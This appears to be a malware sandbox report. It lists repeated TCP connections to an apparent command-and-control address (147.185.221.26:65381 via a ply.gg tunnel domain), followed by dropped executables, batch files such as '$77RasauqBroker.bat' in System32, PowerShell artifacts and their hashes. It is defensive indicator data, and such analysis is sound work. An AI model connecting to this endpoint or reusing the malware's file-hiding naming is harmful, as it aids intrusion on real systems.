US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp

Files

memory/4984-0-0x00007FFBB29D3000-0x00007FFBB29D5000-memory.dmp

memory/4984-1-0x00000000005A0000-0x00000000005BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

MD5 12a225de8199d2a31f049a6f300d8cfa
SHA1 24819a452cf1db15167a52b12f258d27baacbd6e
SHA256 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801
SHA512 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

MD5 7091469b8f2213255ba3c2870a60c7eb
SHA1 17e501e4900bf5dacc5cb0424db87d2ce7a89880
SHA256 d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7
SHA512 f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8

memory/3756-28-0x0000000000C00000-0x0000000000C0E000-memory.dmp

memory/964-31-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

memory/964-30-0x0000000000230000-0x000000000024A000-memory.dmp

memory/4984-19-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

memory/4984-32-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

memory/3756-33-0x00007FFBB29D0000-0x00007FFBB3492000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Launch.bat

MD5 41bded52aa489cdea31a174f89bca818
SHA1 da072fb11e72d2762f96d0f901d7ef7bca17218d
SHA256 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59
SHA512 d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9

C:\Users\Admin\AppData\Local\Temp\hig.bat

MD5 48e8089eae5c8c602b20696cf2840f50
SHA1 b02784c1b5e3fa8a3f2a1ff615870719aeda2b16
SHA256 ab3e6e5835550f067ce594533afba7c8c3320891298ebb6fb76f7bdc8b049174
SHA512 38f90b076c34ff3e25750a69c8b506897d8b0ed2d4a113cbabd496c06b337a206b1a21fde667bef207276bf36e986ab58d384e5467c2ac38280394fa3d27cd10

memory/2576-45-0x000002564A830000-0x000002564A852000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h3nc0pkz.gmu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 a6d2012e8fd4589537bf1e9c4bc10b95
SHA1 364b32ec273d84ee4b9f0bb34d82d24fb16084e9
SHA256 5d5ba59c05d8bb34983beab9bc1fad779beb735c3da524e26731e30e795c82c4
SHA512 36b54d98d11243fed8c2e0474d81904b6cb51d48440bb5f3d8fa16e3e1cb09ac0738b03bcfba6385ba65f36041e69049d2bd2245e901d94ada44295cda2488e7

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 11aea30373318262d742b249e95bf18d
SHA1 550fb029c21c9a7901e72c04df9ce6076a126f43
SHA256 52c8c2cb926d340e603aaf55ebf46f354455b547d6ef7590523102506e79f6ad
SHA512 e8f45e7575a6d6e1428124af8098ab6cdcdf915ad9f77ea671e25dc5ef4432cd7d443f8ddc46ec19564d776880aa94ae24d1221ac0299ef131e49f8e7c215bf0

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 ae0ff45aec4946c6badcb1dc05073646
SHA1 905ab98cab2d2706075bebaabc8355239b4265c3
SHA256 e55e532e2004fd9a74956054c25a24e7afa44baa419a04631b79e35a101661db
SHA512 0e3dc5fbd5187142759ed2d0f03e14e74ac8b839aabf55a2f4e630b38d1b899bae0854f33333032ca5edfd3426b0c945981889bb0fcbc16bd56059fc6f6507f1

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 6bce782d271aad364419772c8950d64b
SHA1 b24ec3192c804fa3f59749736471c6834810a174
SHA256 ceef86e706b9404d3561c2dfbd13b77e6be3df07a52aae5bde01453fb08deb0a
SHA512 2f91176f2c69d50a1e9a438a58b2626d74a165b02d8f4c06e1b189cd550001e5a0e1f07b00d2a8daca15239eaae2d6ab3d6131d5f45a19e5fa2f81ea9653e896

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 4c4e7fb6daf4d99c62fc58947d47ceb9
SHA1 20598cb0ae9e78519aa62a1064eee64b70b8ee95
SHA256 8ccdb5753b997c4afab74ac19ff1840eddb8e97ee5ca47a5d033bb6c91c6b678
SHA512 f44a0199cabd45c4fcd3b8945cf589f5c63a020b3d3bc4fe90f1ff1ceb57d4017066a04571bcf31f330fd2cf7238605c72104c1ba83e02af6eac74d9665d7bf6

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 eeb086a7854dae6cdce64f49eb87d64c
SHA1 82a3a261651432b1b3e29d7d8def566b1b18cf2a
SHA256 5822c2222c4a4121a1667c7d483ff8b91e489a4c5e881c75a4354712bfe6f435
SHA512 3d38272520b97022539d93e206a58c3398ccf30758eef2d31a976a8cb84686f37cc2729efa9d49ad85bd3590ab5baec071772b8eaa2c82db3443a189329cc431

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 c22ead9cd4f450b9013dd97edcbd92d9
SHA1 0c471e4ebb155285dcd55c54811dd481b40fe73e
SHA256 8adacfc3a47b97dd7bd96e32e408dea9d65528f6fe468957c8fd13888989ef3c
SHA512 6251893fc79e4a39ef5625c0c24c799806c6db0a9462f721d55b318e815820e6c3fa954824fb7b84a60e77c2dd9ac3cf2d41151e2503c4331daaae59c8b15a70

C:\Users\Admin\AppData\Roaming\Microsoft\Speech\Files\UserLexicons\SP_43357451CDD242CC822BCFB6AFBA708A.dat

MD5 4d7d9a9face11a139fe2b6a8f1996fca
SHA1 8a8007baa1fefee5a8505a9625e3084c9df5527e
SHA256 4a6c5dc170f8ec004497eb67143ea7c93368fb634cd7eb050dd5ddecb5c58181
SHA512 6fc76cc0665498a64a98abb4a86bb24ea34c94f1c23e4b7d32dfb0e2ae2f43f36162ce3a0226e54b10db1381cee031b09ec779a287038da75975fde308fa6cbb

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 31679f5ef00b31939533d77c27f65954
SHA1 e193adcafa3e9bd049719818aee6f1c597620919
SHA256 797cbbc8b04ddf84d0607192a026a2dae46bf6755f6d87c990216482a5f55194
SHA512 3a7146378a2e825f742b071b78c58f6de5502cd644bf7a6281f8feffc822f6994822703c9759696ab1807fd473b6f99f471b589526b5558b2ee4ffd8fbd0cb98

C:\Windows\Logs\ReAgent\ReAgent.log

MD5 ac8e332adf2614a9ebf9bcdc16c08677
SHA1 040f1fb63f84187af3579fc53dadcc674bde1ca7
SHA256 14c519116708145b1d9d0c5869b412717b56d9e809e1c7cbc3efcd1a2f069144
SHA512 823ec12dc8db66b39339ba146d2bb53e5c58085814322d716d183d99dbf569a851d0e2c46558ffcff79b39c7eb4b092cf9b09417fad18a9c10488f4ea38dece4

C:\Windows\Panther\UnattendGC\diagerr.xml

MD5 4f157b5055b21ae34028756156c332f4
SHA1 d9c1427ea79fcfb6187b32f206ff796c539e6f67
SHA256 35d66d80352ea77ddab275e0656bb5870bed7b7d60db2e6dc6d7626f63eceb7d
SHA512 5afd347c51f1176b9d2b7e98d2748e14a1c52751c1734e5b2c753a45c9b1e0f032aa0f4277cdb02712e29cf47b4d01a95d3677e854d936391f82ea13c362d71b

C:\Windows\Panther\UnattendGC\diagwrn.xml

MD5 b8d3e458ea6c616dbbe42bc7cb919e1d
SHA1 2fa8f355022ff076716690f5afae21430a171063
SHA256 498105e4ddcdc0d42e0a16016c97b2aec22176b9eede80676f094482f8dc7e74
SHA512 0d3266d82fb5060a81018a2a55fbd9873a831eae91ec4d441a6982a3f36b359b9e8e5226097032a7d09148a0b5267056f6c37e22e8c0a7d917c130507deaab19

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b6c336e3b3cb2cd04d42baac1aa4aa0d
SHA1 35a943816f3e9cd596e91be92c4bdb1b05a42d88
SHA256 4518fb6ffb3f70be78cb243cac94fcf74d9c58d2e7bd8c510ebe696d3f81cb60
SHA512 42c4a8f07051ac7c00014ddaa0b0db50bdbcb49a30ae96803e37f3a566c100932367e0a50baead881509ae4a4d49c769513626c5015fe0a02d1d3ae22ca759f4

C:\Windows\System32\Recovery\ReAgent.xml

MD5 910f3916ede823b6b4b5e302e6ececbe
SHA1 d41dda3f32687605193ad0f421c6b3e2bc48ec97
SHA256 5cd6fa01b3949b7fca0fdbdab434d93badcfcdf09de8e2881268abf7ed7064fa
SHA512 893f4a7f2cb3b6aa2ebd0e82f1ab55658b4e7791872bfb97dd269c35df0199c9b590e0902a83cfc8ae85f883f8adb6f514593d4dde68d2c0a5406ecc7851f582

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d0a4a3b9a52b8fe3b019f6cd0ef3dad6
SHA1 fed70ce7834c3b97edbd078eccda1e5effa527cd
SHA256 21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31
SHA512 1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

memory/4376-197-0x000001F76A140000-0x000001F76A8E6000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3ff03fa0f91101b7c4477cbef8cfa128
SHA1 44eeb7f4037615d210d611259ff31113a16cd08e
SHA256 9db3784f6c5993d0dc8e12e193743f3bcd381dbdcb3c676a3d4c1fb3e49dd676
SHA512 f4bdc1698e14d255e25576c566136d9b575bafb367f11453bf3cb37536ff318ff4fc8abce6214e9665b1ab133331f854b40cf8d050e9206ec03fbe2efe853be7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 050567a067ffea4eb40fe2eefebdc1ee
SHA1 6e1fb2c7a7976e0724c532449e97722787a00fec
SHA256 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e
SHA512 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 538b0e698f593f5b117b53936db7f9b4
SHA1 17213ae74094a2c43629492171ccc533d63eb2bd
SHA256 8d61e539308dc6f65f73f88d8dc05336cc122940fff58789978c8b853d0ef52d
SHA512 e184ac2422551fbc3d37a8e58aa5e148e2657d0c2152f05e4759da469fd88a3fd736e3670a30f6ccd5217361304c1d707f1d19c255613b06b6b8045638ed386f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8546c137c9ecfd8edf681124206e5bd9
SHA1 6f4bd92d0c91ce058e3ec511b237679e1af96b3a
SHA256 7534c1af638d58291855245d4a9217a2f7d36acd289ad5d12af130a961379ad1
SHA512 29e938bd2e2d1b4e3204be4b4d6e9d35f1a50e55b8324b04b4746f3ddf5fe9eef6aa8ef42fb89e6fb805c9f5a1afa8f139bbcfc43960f101e02a00db475c1c26

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 781da0576417bf414dc558e5a315e2be
SHA1 215451c1e370be595f1c389f587efeaa93108b4c
SHA256 41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe
SHA512 24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737

